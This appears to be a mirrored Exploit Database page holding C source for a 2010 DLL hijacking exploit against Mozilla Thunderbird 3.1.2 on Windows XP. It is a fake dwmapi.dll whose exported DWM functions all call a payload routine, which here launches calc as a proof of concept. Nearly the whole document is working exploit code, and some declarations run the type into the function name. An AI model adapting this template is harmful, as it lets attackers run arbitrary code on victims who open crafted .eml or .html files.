Mozilla Thunderbird – ‘dwmapi.dll’ DLL Hijacking

• Exploit Database
• 9 阅读

• 作者： h4ck3r#47
  日期： 2010-08-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14783/

• /* 
  Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )
  Date: 26/08/2010
  Author: h4ck3r#47 
  http://twitter.com/hxteam
  Version: Latest Mozilla Thunderbird 3.1.2 
  Tested on: Windows XP SP3
  The code is based on the exploit from "TheLeader"
  Vulnerable extensions: .eml .html
  */
  
  #include <windows.h>
  #define DLLIMPORT __declspec (dllexport)
  
  DLLIMPORT voidDwmDefWindowProc() { evil(); }
  DLLIMPORT voidDwmEnableBlurBehindWindow() { evil(); }
  DLLIMPORT voidDwmEnableComposition() { evil(); }
  DLLIMPORT voidDwmEnableMMCSS() { evil(); }
  DLLIMPORT voidDwmExtendFrameIntoClientArea() { evil(); }
  DLLIMPORT voidDwmGetColorizationColor() { evil(); }
  DLLIMPORT voidDwmGetCompositionTimingInfo() { evil(); }
  DLLIMPORT voidDwmGetWindowAttribute() { evil(); }
  DLLIMPORT voidDwmIsCompositionEnabled() { evil(); }
  DLLIMPORT voidDwmModifyPreviousDxFrameDuration() { evil(); }
  DLLIMPORT voidDwmQueryThumbnailSourceSize() { evil(); }
  DLLIMPORT voidDwmRegisterThumbnail() { evil(); }
  DLLIMPORT voidDwmSetDxFrameDuration() { evil(); }
  DLLIMPORT voidDwmSetPresentParameters() { evil(); }
  DLLIMPORT voidDwmSetWindowAttribute() { evil(); }
  DLLIMPORT voidDwmUnregisterThumbnail() { evil(); }
  DLLIMPORT voidDwmUpdateThumbnailProperties() { evil(); }
  
  int evil()
  {
  WinExec("calc", 0);
  exit(0);
  return 0;
  }